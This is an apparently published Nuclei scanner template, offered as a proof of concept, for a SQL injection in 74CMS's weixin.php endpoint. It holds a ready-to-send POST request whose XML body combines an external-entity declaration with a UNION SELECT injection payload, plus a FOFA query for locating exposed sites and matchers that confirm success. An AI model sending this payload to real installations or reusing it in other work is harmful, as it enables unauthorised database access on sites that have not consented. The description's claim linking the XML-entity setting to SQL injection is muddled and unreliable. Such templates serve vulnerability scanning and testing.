There is a libxml_disable_entity_loader function to prevent XML eXternal Entity Injection, but this function needs to be customized by the user. If the user does not customize it, there will be no filtering, which leads to SQL injection vulnerabilities.
PoC代码[已公开]
id: 74cms-weixin-sqli
info:
name: 74CMS weixin.php - SQL Injection
author: SleepingBag945
severity: high
description: |
There is a libxml_disable_entity_loader function to prevent XML eXternal Entity Injection, but this function needs to be customized by the user. If the user does not customize it, there will be no filtering, which leads to SQL injection vulnerabilities.
reference:
- https://cn-sec.com/archives/25900.html
classification:
cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
fofa-query: app="骑士-74CMS"
product: 74cms
vendor: 74cms
tags: 74cms,weixin,sqli,vuln
variables:
num: '999999999'
http:
- raw:
- |
POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709×tamp=&nonce= HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{num}})#</Content></xml>
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: status
status:
- 200
# digest: 4a0a00473045022100ba9cf7f534df5f75dca4d58f6a11474716bf41c94c1c53ea9f9121fa6b8d50a202202ab548d82bd1071639538c76a262a3c27cd267819509fbc2dd934c2a10bb4871:922c64590222798bb761d5b6d8e72950